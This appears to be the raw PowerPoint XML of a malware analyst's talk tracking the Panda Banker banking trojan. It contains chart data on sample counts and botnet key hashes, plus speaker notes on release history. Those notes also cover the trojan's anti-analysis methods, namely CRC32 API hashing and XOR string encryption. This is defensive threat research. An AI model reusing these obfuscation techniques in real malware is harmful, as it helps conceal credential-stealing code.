                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="42">
                  <c:v>56</c:v>
                </c:pt>
                <c:pt idx="43">
                  <c:v>99</c:v>
                </c:pt>
                <c:pt idx="44">
                  <c:v>131</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-D051-DE4B-937C-9028F8065CCC}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="2024910384"/>
        <c:axId val="2039340720"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2024910384"/>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Version</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039340720"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="203934072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Samples (log)</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024910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Samples</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$35</c:f>
              <c:strCache>
                <c:ptCount val="34"/>
                <c:pt idx="0">
                  <c:v>f74c5f2d12c616fc31d6ce8d6cc2c4e8 </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1d6455fcd8ccb511d0b552fb946cbfc6 </c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>17683c9fad54a66d0f2db1b3b3befef7 </c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>6d37cff905fe9838e592faad174a1d48 </c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>b696ca2c75e53f6c1fd4528e3dff64db </c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5b8178163cd3183a8425681a3aae5dd9 </c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>08a55d58235d4cb45af48b19b0ccf623 </c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>2cec25f8a419317e59af07b33bca94bf </c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>42f986a0921d079fd5f25456bcdec819 </c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>92cf7854f7cc343fd4c18fd752eaacd7 </c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>36a27bcf5ff2d8297558fa260232e130 </c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>e62b0bd79b87f5b25e25bfe3c0b62366 </c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>3d4120f73c9768e86439b3d503160915 </c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>f8c0de335771422ade3818cde1c92a4f </c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>70f95f0b971e1f35110374c887adcabd </c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>9499a3a2ad587859f6c67de53f304438 </c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>bb848c612ed96dc58015dcee5364cb1d </c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>2587f79592e49af779c64533b3778a38 </c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>6aee324dc17f003b0a54c7d615412f64 </c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>75880767c765e84f682ce2e9bff9b344 </c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>4ce7b478a223f8693f8edc0de1316580 </c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>7b310d296bb47e57e1c8d67f52d89ca6 </c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>6b85ce5458299f27d88fac96210bc2a1 </c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>975e6e2bd85026d8475a2a090c4e1269 </c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>ee52e367bfa94108a2ad01b4445fe2f3 </c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>574aa7769cf8889c5502a944b2b18609 </c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>078193c64ba0682b885a133aff9ccdee </c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>b2851224e48e98e15a9433109597f8bc </c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>89e770d738bf5950bb2205063392f31a </c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>d724a5040c7b8492228e9fc1716429ac </c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>1b02708b2110c5a14f8f70d0d75b7bd7 </c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>2d12493fb6393f970590a918bb4a55d5 </c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>b37d3f277ce2182668a02bbc9edffd6b </c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>2f99642fc51f1b4951005a50666b1629 </c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$B$2:$B$35</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="34"/>
                <c:pt idx="0">
                  <c:v>1556</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>600</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>456</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>320</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>160</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>139</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>129</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>123</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>115</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>87</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>81</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>71</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>64</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>56</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>55</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>48</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>46</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>36</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>32</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>17</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>15</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>14</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="31">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="32">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="33">
                  <c:v>8</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-9D63-4D41-92EF-6A816091AEB7}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="219"/>
        <c:overlap val="-27"/>
        <c:axId val="2011134767"/>
        <c:axId val="2132018687"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="2011134767"/>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Botnet Key Hashes (MD5)</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132018687"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="21320186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baseline="0" dirty="0"/>
                  <a:t>Samples (log)</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011134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r>
              <a:rPr lang="en-US" sz="1290" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Chart Title, Arial Bold, 16 pt.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="65656A"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr sz="1290" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-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w="20483">
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
      <c:txPr>
        <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr sz="1290" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
              <a:solidFill>
                <a:srgbClr val="65656A"/>
              </a:solidFill>
              <a:latin typeface="+mj-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52"/>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 id="14">
  <a:schemeClr val="accent1"/>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withinLinear" id="14">
  <a:schemeClr val="accent1"/>
</cs:colorStyle>
</file>

<file path=ppt/charts/colors19.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20.xml><?xml version="1.0" encoding="utf-8"?>
<cs:colorStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" meth="withinLinear" id="14">
  <a:schemeClr val="accent1"/>
</cs:colorStyle>
</file>

<file path=ppt/charts/colors21.xml><?xml version="1.0" encoding="utf-8"?>
<cs:colorStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" meth="withinLinear" id="14">
  <a:schemeClr val="accent1"/>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withinLinear" id="14">
  <a:schemeClr val="accent1"/>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74115-067D-1D40-82F4-3F0DA9560BFA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/4/18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B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89902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Dennis Schwarz and I am a Malware Analyst with Proofpoint.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today I want to talk about a malware family that I’ve been analyzing and tracking for a number of years…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="509979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Trying to collect and timestamp all the samples is an ongoing and difficult project… but I wanted to give you a rough idea of Panda Banker’s daily unique sample activity from 2016, 17, and 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there has been about 5 unique samples of Panda Banker per day, but in general there are a lot less new samples now than in previous years.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3909435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Throughout this time there have been a total of 45 different versions over 6 major releases. There were 2 major releases in 2016 and 4 in 2017. On average each major release contains about 8 minor version releases. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3137929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 wanted to highlight the development activity in 2018. Up until June, there was almost 2 releases every month.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June, version 2.6.10 was released and that has been the latest version ever since.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2442781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see the relative popularity and stability of each version, here is a rough sample distribution grouped by version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2.2.8 released in October 2016 has been the most popular version sample-wise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seen only 1 sample each of version 2.2.1 released in April 2016 and version 2.4.4 released in August 2017, so I’m speculating there might have been some show stopping bugs in those releases.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1014056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switch gears for a few slides and dive into a more technical malware analysis of Panda Banker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3510461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the version thread by tracking down where the version information is stored in a Panda Banker sample.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Up to version 2.5.7, the version was pretty easy to find. You could look for this %u format string, there’s only 1 reference to it, and the version numbers would be right there.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1482579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in version 2.6.0, Panda Banker started encrypting this format string so it’s not as easy to find. What I do for these newer versions is to search for this second %u format string, which is still a plaintext string, and then search for the version numbers near that area of the code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="290976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compare, how Panda Banker stores its version number is completely different than how most of the other Zeus variants store theirs. They tend to store the version as a DWORD value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="910451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difference from Zeus and most of its variants I believe is that up until version 2.5.7, just about all of the Windows API functions were resolved by hash at runtime in Panda Banker. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is a common anti-analysis mechanism to prevent analysts and automated tools from easily determining the code’s purpose.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3193241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hashing algorithm that Panda Banker used was just a CRC32 checksum of the API function name.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42266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family is Panda Banker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Panda Banker’s secret ingredient is cybercrime! It’s a banking malware that helps a threat actor steal user credentials, financial account information, and ultimately money.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s been around for awhile, so you probably heard of it already, but let’s dive in anyway.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2583510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version 2.5.7, there were about 540 calls to this “resolve Windows API by hash” function and here’s what they resolved to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starting in version 2.6.0, they removed this anti-analysis feature for some reason and they aren’t doing anything special with the Windows API calls anymore.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3715682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version 2.2.9, Panda Banker encrypted most of its important strings using the same encryption method as Zeus. It’s an XOR based decryption where each string has its own random WORD sized key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2707394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version 2.2.10 to 2.5.7 they changed the encryption algorithm slightly by NOTing the XOR key.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
